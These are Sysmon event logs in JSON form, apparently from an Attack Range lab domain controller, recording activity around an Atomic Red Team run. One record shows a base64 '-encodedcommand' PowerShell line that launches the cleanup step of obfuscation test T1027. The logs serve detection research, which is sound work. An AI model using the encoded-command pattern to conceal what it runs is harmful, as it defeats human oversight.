{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5479,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.109\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.109","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5480,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5481,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.141\r\nProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nProcessId: 3088\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3wqv20mu.cfl.ps1\r\nCreationUtcTime: 2020-08-01 05:52:47.141","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.141","ProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3wqv20mu.cfl.ps1","CreationUtcTime":"2020-08-01 05:52:47.141","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5482,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.187\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.187","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5483,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.187\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.187","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5484,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.534\r\nProcessGuid: {A837DB8D-032F-5F25-0000-001058930A00}\r\nProcessId: 748\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nParentProcessId: 3088\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.534","ProcessGuid":"{A837DB8D-032F-5F25-0000-001058930A00}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","ParentProcessId":"3088","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5485,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-001058930A00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342a5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-001058930A00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342a5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
